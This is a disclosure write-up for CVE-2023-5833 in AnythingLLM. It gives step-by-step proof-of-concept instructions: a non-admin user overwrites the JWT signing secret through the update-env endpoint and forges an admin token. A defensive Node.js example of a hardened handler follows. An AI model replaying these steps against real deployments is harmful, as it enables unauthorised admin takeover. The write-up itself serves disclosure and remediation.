
CVE-2023-5833 - Admin account TakeOver

Description of the CVE-2023-5833

📝 Description

The endpoint api/system/update-env allows any authenticated user to change environment variables of the back-end process. We will abuse this functionality to change the JWT_SECRET environment variable (which is used to sign the JWT tokens), so that tokens for any account can be forged.

💥 Proof of Concept

Imagine the following list of accounts is used: [image]

Log in to the user account (which is not admin) and grab the JWT token from localStorage (stored under the key anythingllm_authToken): [image]

The JWT token contents are (base64 decoded):

```json
{
  "alg": "HS256",
  "typ": "JWT"
}
{
  "id": 2,
  "username": "user",
  "iat": 1694641865,
  "exp": 1697233865
}
```

Now, in Postman, send a POST request to http://localhost:3001/api/system/update-env with our JWT as the Bearer token and the following JSON as the body:

```json
{"JWTSecret":"admintakeover"}
```

Now go to jwt.io, paste the JWT token, change the id and username, and sign the JWT with the secret admintakeover: [image]

Put this token in your localStorage and reload the page; you should now be admin (we can see I'm admin with the forged JWT token): [image]
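The root cause above is an authorization gap, not a flaw in JWT itself: an endpoint that rewrites the process environment only checked that the caller held some valid token, and the signing secret was among the writable keys. The following is an added example (not AnythingLLM's own code) that contrasts that vulnerable handler shape with a hardened one in Node.js, the back-end language of the project. It assumes a hypothetical `user` object with `id`, `username` and `role` fields, an allowlist of editable settings that is constructed for the example, and a constructed audit-line format; the key names `OpenAiModelPref`, `EmbeddingEngine` and `VectorDB` and the role value `default` are assumptions, not taken from the project.

```javascript
// Added example, not AnythingLLM's own code. Models the api/system/update-env
// handler as a pure function so the two shapes can be compared side by side.

// Env keys that must never be writable through an HTTP endpoint, even by an
// admin: whoever controls the JWT signing secret can mint a token for any
// account, which is exactly the escalation described in the post.
const PROTECTED_KEYS = new Set(["JWTSecret", "JWT_SECRET"]);

// Allowlist of settings an admin may legitimately change at runtime.
// These names are constructed for the example, not taken from the project.
const ALLOWED_KEYS = new Set(["OpenAiModelPref", "EmbeddingEngine", "VectorDB"]);

// Vulnerable shape: only checks that *some* user is authenticated, then writes
// every key from the request body into the back-end's env.
function vulnerableUpdateEnv(user, body, env) {
  if (!user) return { status: 401, env, rejected: [], audit: [] };
  const next = { ...env };
  for (const [key, value] of Object.entries(body)) next[key] = String(value);
  return { status: 200, env: next, rejected: [], audit: [] };
}

// Hardened shape: admin role required, protected keys refused outright,
// everything else must be on the allowlist, and refused attempts produce an
// audit line a log-monitoring rule can alert on.
function hardenedUpdateEnv(user, body, env) {
  const keys = Object.keys(body);
  if (!user) return { status: 401, env, rejected: keys, audit: [] };
  const audit = [];
  if (user.role !== "admin") {
    audit.push(auditEvent(user, keys, "non_admin_env_update"));
    return { status: 403, env, rejected: keys, audit };
  }
  const next = { ...env };
  const rejected = [];
  for (const [key, value] of Object.entries(body)) {
    if (PROTECTED_KEYS.has(key)) {
      rejected.push(key);
      audit.push(auditEvent(user, [key], "protected_env_key_write"));
      continue;
    }
    if (!ALLOWED_KEYS.has(key)) {
      rejected.push(key);
      continue;
    }
    next[key] = String(value);
  }
  return { status: 200, env: next, rejected, audit };
}

// One-line, grep-friendly audit record (constructed format, assumed here).
function auditEvent(user, keys, reason) {
  return `env_update_denied user_id=${user.id} username=${user.username} ` +
    `reason=${reason} keys=${keys.join(",")}`;
}

// Replays the post's scenario: user id 2 (not admin) tries to set the JWT
// secret, then an admin tries the same body against the hardened handler.
function demo() {
  const env = { JWTSecret: "original-startup-secret" }; // constructed value
  const user = { id: 2, username: "user", role: "default" }; // role name assumed
  const body = { JWTSecret: "admintakeover" }; // the body from the post
  const admin = { id: 1, username: "admin", role: "admin" };
  return {
    vulnerable: vulnerableUpdateEnv(user, body, env),
    hardened: hardenedUpdateEnv(user, body, env),
    adminAttempt: hardenedUpdateEnv(admin, body, env),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

Two design points are worth noting. First, the role check and the protected-key denylist are independent layers: even if a role check is later weakened, the signing secret still cannot be changed over HTTP, which is the safer default because a secret that changes at runtime invalidates or, worse, re-keys every session. Second, the denied attempts are returned as audit lines rather than silently dropped, so a non-admin posting `JWTSecret` to this endpoint becomes a detectable event rather than a quiet failure.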

🖊️ References

You can find the report here and the CVE details here.
